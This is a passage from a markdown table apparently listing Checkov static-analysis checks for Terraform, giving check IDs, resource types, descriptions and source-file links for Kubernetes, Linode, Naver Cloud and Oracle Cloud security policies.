[AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 1909 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 1910 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 1911 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 1912 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 1913 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 1914 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 1915 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 1916 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 1917 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 1918 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 1919 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 1920 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 1921 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 1922 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 1923 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 1924 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 1925 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 1926 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 1927 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 1928 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 1929 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 1930 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 1931 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 1932 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 1933 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) | -| 1934 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 1935 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 1936 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 1937 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 1938 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 1939 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 1940 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 1941 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 1942 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) | -| 1943 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 1944 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 1945 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 1946 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 1947 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 1948 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 1949 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 1950 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 1951 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | -| 1952 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | -| 1953 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 1954 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 1955 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 1956 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 1957 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 1958 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 1959 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 1960 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 1961 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | -| 1962 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | -| 1963 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 1964 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 1965 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 1966 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 1967 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) | -| 1968 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) | -| 1969 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) | -| 1970 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) | -| 1971 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) | -| 1972 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) | -| 1973 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) | -| 1974 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | -| 1975 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | -| 1976 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) | -| 1977 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) | -| 1978 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) | -| 1979 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) | -| 1980 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. | Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) | -| 1981 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) | -| 1982 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) | -| 1983 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) | -| 1984 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) | -| 1985 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. | Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) | -| 1986 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) | -| 1987 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) | -| 1988 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) | -| 1989 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) | -| 1990 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | -| 1991 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | -| 1992 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) | -| 1993 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) | -| 1994 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) | -| 1995 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | -| 1996 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | -| 1997 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. | Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) | -| 1998 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) | -| 1999 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) | -| 2000 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) | -| 2001 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) | -| 2002 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) | -| 2003 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) | -| 2004 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | [InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) | -| 2005 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) | -| 2006 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) | -| 2007 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) | -| 2008 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) | -| 2009 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) | -| 2010 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) | -| 2011 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | [IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) | -| 2012 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) | -| 2013 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) | -| 2014 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) | -| 2015 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) | -| 2016 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) | -| 2017 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) | -| 2018 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) | -| 2019 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) | -| 2020 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) | -| 2021 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) | -| 2022 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) | -| 2023 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 2024 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | 